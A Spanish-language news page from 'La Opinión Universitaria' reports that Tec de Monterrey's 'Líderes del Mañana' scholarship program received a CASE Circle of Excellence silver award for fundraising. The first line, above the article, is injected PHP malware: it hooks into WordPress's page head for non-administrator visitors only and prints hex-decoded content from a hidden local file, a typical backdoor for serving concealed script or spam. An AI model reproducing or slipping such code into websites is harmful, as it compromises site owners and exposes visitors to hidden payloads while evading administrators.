if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Recibe “Líderes del Mañana” del Tec reconocimiento en Procuración de Fondos – La Opinión Universitaria La Opinión Universitaria
Menu

Recibe “Líderes del Mañana” del Tec reconocimiento en Procuración de Fondos

Firme en sus compromisos de fortalecer la educación y apoyar la transformación social, a través de su programa de Líderes del Mañana, el Tec de Monterrey fue reconocido por el Consejo para el Avance y Apoyo a la Educación (CASE), con el premio “Circle of Excellence”nivel plata, en la categoría de Procuración de Fondos.

Desde 2014, CASE, asociación sin fines de lucro que agrupa a más de 3 mil instituciones alrededor del mundo, reconoce anualmente las mejores prácticas en las áreas de vinculación con egresados, comunicación y marketing y recaudación de fondos.

Este año, contó con una participación de 2 mil 856 propuestas provenientes de 611 instituciones; de las cuales se reconocieron por su trabajo de calidad e impacto, un total de 399 propuestas en las 100 categorías.

El Tec de Monterrey fue la única en la región de Latinoamérica que en esta ocasión recibió este reconocimiento.

Para Juan Pablo Murra, Vicepresidente de Relaciones y Desarrollo del Tec de Monterrey recibir este reconocimiento refrenda el compromiso del Tec para seguir promoviendo iniciativas que transformen a México.

“Agradecemos a CASE por reconocer el programa de becas “Líderes del Mañana” como una iniciativa transformadora que genera movilidad social, a través de una educación de calidad, que da oportunidades a jóvenes con muy alto potencial de liderazgo para transformar a nuestro país”, asegura.

Líderes del Mañana es la iniciativa de movilidad social más importante del Tec de Monterrey que otorga becas del 100% a jóvenes mexicanos de escasos recursos, con talento y compromiso social, apoyándolos para estudiar una carrera profesional en cualquiera de sus campus en la República Mexicana, adicional a la posibilidad de realizar un intercambio, prácticas escolares o talleres de verano fuera del país. Mediante su procuración de fondos, que permite tener objetivos medibles y alcanzables, además del apoyo de Sorteos Tec y de donantes, mil 143 estudiantes han sido becados y cursan su carrera profesional en el Tec.

El alcance de este programa y su esquema para que otros recaudadores de fondos puedan replicarlo, fueron los principales aspectos reconocidos por CASE con el “Premio Círculo de Excelencia 2019”.

“El trabajo realizado por el Tec de Monterrey con su programa de Líderes del Mañana, no sólo ha trascendido en su institución, sino que ahora permite que más instituciones puedan conocer otras maneras creativas para apoyar a estudiantes talentosos con dificultades económicas con un esquema innovador. Celebramos con el Tec este gran logro y deseamos con esto se inspiren más instituciones en la región a participar y compartir sus mejores prácticas”, afirma Angélica Careaga, directora del CASE para América Latina.

Gracias a este programa, que inició hace 6 años, a la fecha se han graduado 125 jóvenes y el próximo 5 de agosto, más estudiantes provenientes de todo el país integrarán la sexta generación de Líderes del Mañana. Por este motivo, es importante destacar el impacto social que representa el modelo de procuración de fondos del programa Líderes del Mañana, que repercute en que los estudiantes beneficiados tengan la oportunidad de escalar del decil 3 al 9 en la distribución salarial posterior a su ingreso a la institución.

Continuar apoyando a programas como Líderes del Mañana es clave para ayudar a los jóvenes mexicanos de excelencia académica que más lo necesitan, quienes, a su vez, permitirán que el país aumente 1.2% su crecimiento económico.

  • No comments

    Deja una respuesta

    Tweets recientes